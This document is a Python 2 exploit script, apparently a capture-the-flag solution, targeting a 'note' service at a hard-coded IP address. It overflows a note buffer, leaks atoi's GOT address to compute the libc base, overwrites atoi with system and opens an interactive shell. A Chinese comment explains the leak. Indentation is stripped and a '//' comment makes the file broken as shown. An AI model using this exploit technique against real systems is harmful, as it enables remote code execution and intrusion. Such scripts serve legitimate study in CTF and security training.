from threading import Thread
from zio import *
target = './note'
target = ('114.215.220.77', 10001)
def interact(io):
def run_recv():
while True:
try:
output = io.read_until_timeout(timeout=1)
except:
return
t1 = Thread(target=run_recv)
t1.start()
while True:
d = raw_input()
if d != '':
io.writeline(d)
def add(io, length, buff):
io.read_until('--->>')
io.writeline('1')
io.read_until(':')
io.writeline(str(length))
io.read_until(':')
io.writeline(buff)
def edit(io, id, buff):
io.read_until('--->>')
io.writeline('3')
io.read_until('id')
io.writeline(str(id))
io.read_until('append')
io.writeline('2')
io.read_until(':')
io.writeline(buff)
def edit2(io, id, buff):
io.read_until('--->>')
io.writeline('3')
io.read_until('id')
io.writeline(str(id))
io.read_until('append')
io.writeline('1')
io.read_until(':')
io.writeline(buff)
def show(io, id):
io.read_until('--->>')
io.writeline('2')
io.read_until('id')
io.writeline(str(id))
io.read_until('is ')
atoi_addr = l64(io.readline().strip('
').ljust(8, 'x00'))
return atoi_addr
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
io.read_until('name')
io.write('a'*0x30+l64(0)+l64(0x70))
io.read_until('address')
io.writeline(l64(0)+l64(0x70))
add(io, 128, 94*'a')
#io.gdb_hint()
edit(io, 0, 'b'*33+'c'+l32(0x6020E0+0x40))
atoi_got = 0x602088
//应该是先将地址溢出,然后添加新的note,写入的是note数组的指针的地址,将这个地址的内容写成atoi的地址,然后显示的是atoi的地址——泄露
add(io, 0x60, l64(atoi_got))
atoi_addr = show(io, 0)
base = atoi_addr - 0x36e80
print hex(base)
system = base + 0x45390
print hex(system)
edit2(io, 0, l64(system))
io.read_until('--->>')
io.writeline('sh')
interact(io)
exp(target)